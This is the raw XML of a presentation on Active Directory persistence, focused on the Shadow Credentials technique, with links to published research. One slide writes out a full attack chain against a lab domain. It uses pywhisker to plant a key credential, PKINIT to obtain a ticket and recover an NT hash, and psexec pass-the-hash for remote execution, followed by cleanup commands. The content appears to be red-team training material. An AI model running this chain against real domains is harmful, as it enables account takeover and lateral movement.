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2" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="268" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="266"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20" d="100"/>
          <a:sy n="120" d="100"/>
        </p:scale>
        <p:origin x="120" y="114"/>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25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2632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31086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3127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05208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38940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8782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424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6788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0990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531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278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52456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6835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150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4340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6467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8387554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TheHorseman@192.168.217.128"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dsinternals.com/wp-content/uploads/eu-19-Grafnetter-Exploiting-Windows-Hello-for-Business.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortalicesolutions.com/posts/pkinit-ftw-chaining-shadow-credentials-and-adcs-template-abuse" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/eladshamir/Whisker" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ShutdownRepo/pywhisker" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/"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hyperlink" Target="https://adsecurity.org/?p=1906" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=2753" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=1772" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=3466" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=1785" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestlab.blog/2022/02/07/shadow-credentials/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=2716" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestlab.blog/2019/10/21/persistence-security-support-provid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hyperlink" Target="https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/identity-protection/hello-for-business/hello-deployment-issues.m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eb.mit.edu/kerberos/krb5-1.12/doc/admin/pkinit.html" TargetMode="Externa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www.rapid7.com/blog/post/2017/10/25/roca-vulnerable-rsa-key-generation/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MichaelGrafnetter/DSInternals/blob/master/Documentation/PowerShell/Get-ADKeyCredential.md"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95320" y="1444634"/>
            <a:ext cx="10693135" cy="1241922"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0" smtClean="0"/>
              <a:t>AD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0" err="1" smtClean="0"/>
              <a:t>Persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0" err="1" smtClean="0"/>
              <a:t>methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectángulo 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3724952" y="3936097"/>
            <a:ext cx="9005086" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1555554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73" y="459509"/>
            <a:ext cx="8825659" cy="741218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0"/>
              <a:t>Non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1"/>
              <a:t>Joined</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de texto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1089891"/>
            <a:ext cx="11674764" cy="4895273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> pywhisker.py:</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>pywhisker.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>-d "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>" --dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> 192.168.217.199 -u "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>Administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>" -p "EvilCorp1." --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>target "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>TheHorseman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>" --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1" smtClean="0"/>
              <a:t>TheHorsemanCert</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>- gettgtpkinit.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>TheHorseman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>cert-pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>TheHorsemanCert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1" smtClean="0"/>
              <a:t>.pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>pfx-pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>EFRb7BYDNcREshtrNrTq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1" smtClean="0"/>
              <a:t>TheHorseman.ccache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>-dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> 192.168.217.199 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>–v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>export</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>KRB5CCNAME=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1" smtClean="0"/>
              <a:t>TheHorseman.ccache</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>	- getnthash.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> d12c3f75494ab5770f21c1116d634880e5a7aa7a8b29e59d699c98b72a9cbc3d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>TheHorseman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>192.168.217.199</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>	- psexec.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>-hashes :a8091138b933d7fff8bcdb552e3a9835 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>TheHorseman@192.168.217.128</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>msDS-KeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> of a target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>python3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>pywhisker.py -d “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>" -u “Administrator" -p “EvilCorp1." --target “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>TheHorseman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>" --action "remove" --device-id a8ce856e-9b58-61f9-8fd3-b079689eb46e</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clear all the values of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msDS-KeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute of a target object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" smtClean="0"/>
              <a:t>- python3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>pywhisker.py -d “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>" -u “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>Administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>" -p “EvilCorp1." --target “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>TheHorseman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>" --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0" err="1"/>
              <a:t>clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1050" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4020368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7288" y="358471"/>
            <a:ext cx="10016629" cy="1981200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>guys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t> Galaxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>brain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de texto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447288" y="1900361"/>
            <a:ext cx="11487620" cy="3395208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Shadow Credentials: Abusing Key Trust Account Mapping for Account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Takeover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Elad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Shamir)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Exploiting Windows Hello For Business </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Grafnetter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Manipulating User Passwords Without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(N00py)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>PyWhisker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ShutDown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Whisker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Elad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Shamir)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>PKINIT FTW - Chaining Shadow Credentials and ADCS Template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Abuse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>Matthew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" smtClean="0"/>
              <a:t>Creel)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
